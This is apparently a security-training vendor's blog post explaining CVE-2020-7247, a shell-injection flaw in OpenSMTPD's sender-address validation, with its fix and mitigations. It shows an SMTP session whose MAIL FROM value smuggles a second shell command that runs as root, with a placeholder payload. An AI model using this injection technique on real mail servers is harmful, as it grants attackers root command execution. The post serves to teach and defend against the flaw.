OpenSMTPD is the mail transfer agent (e-mail server) of the OpenBSD operating system and is also available as a ‘portable’ version for other UNIX systems, such as GNU/Linux.
OpenBSD is known for having a strong focus on security; consequently, serious vulnerabilities in OpenBSD are rare. There have only been two remote exploits discovered in the default install since 1997.
The recent CVE-2020-7247 vulnerability in OpenSMTPD, announced on the 29th of January 2020, nearly added a third item to the list.
RangeForce has created a new security challenge focusing on Privileged Remote Code Execution in OpenSMTPD called “SOC Challenge – OpenSMTPD.” In this challenge you will learn how this shell injection vulnerability works and how to exploit it to run commands on the server.
As a mail transfer agent (MTA), OpenSMTPD can perform the following functions:
The default OpenBSD configuration only allows the first two use cases and does not accept remote connections. This ‘secure by default’ stock configuration is what managed to limit this to a serious, but local vulnerability. If the server configuration is changed to allow receiving mail from other systems the vulnerability can be exploited to allow for full remote root access.
The vulnerability is caused by improper validation of the e-mail sender address.
When receiving e-mail for local users, the OpenSMTPD server calls an external process to save it to the user’s inbox; this simplifies supporting different file formats for the inbox as well as allows users to create custom rules for processing the e-mails they receive.
The sender address is included in the command line when the mailbox delivery program is called; if the sender address includes shell meta-characters these will be interpreted by the shell, allowing the execution of commands on the server.
Before showing how the vulnerability is exploited, here is an example of a normal, non-malicious e-mail being transferred:
SENDER> [connects to server on port 25]
SERVER> 220 vulnerable-server.net ESMTP OpenSMTPD
SENDER> HELO friendly-sender.org
SERVER> 250 vulnerable-server.net Hello friendly-sender.org, pleased to meet you
SENDER> MAIL FROM:<alice@friendly-sender.org>
SERVER> 250 2.0.0 Ok
SENDER> RCPT TO:<bob@vulnerable-server.net>
SERVER> 250 2.1.5 Destination address valid: Recipient ok
SENDER> DATA
SERVER> 354 Enter mail, end with "." on a line by itself
SENDER> Subject: Hello
SENDER>
SENDER> Lorem ipsum dolor sit amet
SENDER> .
SERVER> 250 2.0.0 Message accepted for delivery
Once the message is
accepted for delivery
the server runs the command:
/usr/libexec/mail.localalice@friendly-sender.orgbob
and passes the content of the mail on the standard input.
The mail.local program then saves the e-mail to Bob’s inbox file.
To exploit the vulnerability, a hacker can include shell meta-characters (such as ;, which terminates one command and starts another) in the sender address:
HACKER> [connects to server on port 25]
SERVER> 220 vulnerable-server.net ESMTP OpenSMTPD
HACKER> HELO evil-hacker.com
SERVER> 250 vulnerable-server.net Hello evil-hacker.com, pleased to meet you
HACKER> MAIL FROM:<; killall puppies ; echo >
SERVER> 250 2.0.0 Ok
HACKER> RCPT TO:
SERVER> 250 2.1.5 Destination address valid: Recipient ok
HACKER> DATA
SERVER> 354 Enter mail, end with "." on a line by itself
HACKER> Subject: Kill all puppies!
HACKER>
HACKER> Lorem ipsum dolor sit amet
HACKER> .
SERVER> 250 2.0.0 Message accepted for delivery
Once the message is accepted for delivery, the server runs the command
/usr/libexec/mail.local ; killall puppies ; echo @vulnerable-server.net root
The @vulnerable-server.net is added because the address validation mistakenly assumes that the e-mail has come from a local process on the same server. The shell interprets this as:
/usr/libexec/mail.local
killall puppies
echo @vulnerable-server.net root
This allows the hacker to run
killall puppies
as root on the vulnerable server.
The vulnerability was added in OpenSMTPD version 6.4.0, when the architecture for local mail delivery was refactored, and removed in version 6.6.2 by fixing the address validation function. Most “stable” GNU/Linux distributions (e.g. Ubuntu, Debian, Red Hat) were still using version 6.0.3, from before the vulnerability was added, and were therefore not affected.
The simplest fix is to upgrade to the latest version of OpenSMTPD (6.6.4 at the time of writing).
There are also some possible mitigations which could have prevented or at least reduced the impact of the vulnerability:
/var/spool/mail/
and to redirect root’s mail to a less-privileged user. This will mean that the mail delivery process never has to run as root.
The cause of this vulnerability was a lack of validation of untrusted input. This condition enables attackers to run arbitrary commands to allow for unrestricted access. This is a common occurrence and this vulnerability is pervasive even today, due to oversights in the programmatic process. By completing RangeForce’s SOC Challenge – OpenSMTPD training you will learn about this vulnerability, how to exploit it, and how to protect your systems from it. RangeForce provides for coverage of this commonly seen vulnerability with specific modules of instruction on real systems, teaching users to how to locate and remediate this and other conditions including:
Try out this new challenge module on the latest OpenSMTPD vulnerability. The advanced simulation challenges the learner to investigate an OpenSMTPD server and discover any vulnerabilities. Request a consultation to see the training modules in action.
Links